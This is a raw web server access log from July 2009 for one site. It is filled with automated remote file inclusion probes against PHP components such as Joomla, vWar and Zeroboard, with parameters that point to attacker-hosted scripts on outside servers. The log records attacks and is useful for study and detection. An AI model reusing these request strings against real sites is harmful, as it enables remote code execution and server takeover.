77.221.130.4 - - [05/Jul/2009:07:19:09 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:07:19:14 -0700] "GET /logs/access.log%20//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:19:38 -0700] "GET /logs//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:19:38 -0700] "GET /index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:19:41 -0700] "GET /logs/access_090514.log//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.93.90.155 - - [05/Jul/2009:07:19:52 -0700] "GET /logs/access_090525.log%20%20/playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:20:32 -0700] "GET /logs//?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:20:33 -0700] "GET /logs/access_090610.log//?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:20:33 -0700] "GET /?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:21:08 -0700] "GET /logs/access_090609.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:21:16 -0700] "GET /logs/access_090610.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:21:34 -0700] "GET /logs/access_090610.log%20%20//?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:21:34 -0700] "GET /?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:21:34 -0700] "GET /logs//?_zb_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:22:03 -0700] "GET /logs/access_090513.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:22:52 -0700] "GET /logs/access_090622.log%20%20//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:22:55 -0700] "GET /logs/access_090622.log%20%20//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:21 -0700] "GET /logs/access_090614.log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:21 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:24 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:36 -0700] "GET /logs/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:38 -0700] "GET /logs/access_090606.log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:39 -0700] "GET /logs/access_090614.log/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:39 -0700] "GET /libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:23:39 -0700] "GET /logs/access_090619.log/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:23:58 -0700] "GET /logs//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:23:59 -0700] "GET /logs/access_090602.log//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:23:59 -0700] "GET /modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:23:59 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:23:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:24:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:24:20 -0700] "GET /modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:24:20 -0700] "GET /logs//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:24:20 -0700] "GET /logs/access_090619.log%20%20//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:24:24 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:24:39 -0700] "GET /logs/access_090616.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:24:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:24:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:24:46 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:25:04 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:25:10 -0700] "GET /logs//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:25:10 -0700] "GET /logs/access_090619.log//modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:25:13 -0700] "GET /modules/vwar/admin.php?vwar_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:25:16 -0700] "GET /logs/access_090616.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:25:33 -0700] "GET /logs/access_090514.log%20%20//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:25:35 -0700] "GET /logs/access_090514.log%20%20//index.php?basepath=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:07:26:16 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:07:26:16 -0700] "GET /logs/access_090515.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:07:26:16 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.65" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:26:44 -0700] "GET /logs/access_090529.log//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:26:44 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:26:45 -0700] "GET /logs//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:07:26:47 -0700] "GET /logs/access_090610.log%20%20//?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:07:26:47 -0700] "GET /logs//?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:07:26:48 -0700] "GET /?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:27:01 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:27:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:27:01 -0700] "GET /logs/access_090523.log%20//modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:28:23 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
218.38.243.71 - - [05/Jul/2009:07:29:44 -0700] "GET /logs/access_090610.log//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:30:55 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:31:04 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:31:07 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:31:15 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:28 -0700] "GET /logs/access_090620.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:28 -0700] "GET /logs/access_090620.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:28 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:28 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:31 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:33:31 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:12 -0700] "GET /logs/access_090525.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:12 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:13 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:07:34:17 -0700] "GET /logs/access_090525.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:07:34:17 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:07:34:17 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:33 -0700] "GET /logs/access_090525.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:33 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:34 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:45 -0700] "GET /logs/access_090525.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:45 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:34:45 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:35:10 -0700] "GET /logs/access_090612.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:35:19 -0700] "GET /logs/access_090612.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:07:35:55 -0700] "GET /logs/access_090206.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:07:35:55 -0700] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090206.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:07:35:55 -0700] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_090206.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:36:02 -0700] "GET /logs/access_090520.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:07:36:03 -0700] "GET /logs/access_090520.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:11 -0700] "GET /logs/access_090524.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:15 -0700] "GET /admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:15 -0700] "GET /logs//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:16 -0700] "GET /logs/access_090531.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:36:24 -0700] "GET /logs/access_090524.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:36:24 -0700] "GET /admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:36:29 -0700] "GET /logs//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:43 -0700] "GET /logs/access_090524.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:43 -0700] "GET /admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:43 -0700] "GET /logs//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:36:44 -0700] "GET /logs/access_090531.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:36:45 -0700] "GET /logs/access_090531.log//admin/index.php?_shop_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:37:43 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:37:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:37:43 -0700] "GET /logs/access_090523.log%20//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:39:28 -0700] "GET /logs/access_090523.log%20//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:39:29 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.16.17.5 - - [05/Jul/2009:07:39:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:39:49 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
